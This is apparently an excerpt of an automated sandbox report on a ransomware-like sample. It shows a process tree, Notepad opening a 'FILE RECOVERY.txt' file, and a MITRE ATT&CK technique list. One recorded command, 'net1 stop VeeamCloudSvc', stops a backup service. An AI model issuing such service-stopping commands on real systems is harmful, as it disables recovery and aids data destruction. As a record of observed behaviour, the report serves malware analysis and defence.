C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4168

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\FILE RECOVERY.txt
1⤵
PID:3248

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc
1⤵
PID:3524

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

Impair Defenses

T1562

File Permissions Modification

T1222

Modify Registry

Credential Access

Discovery

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery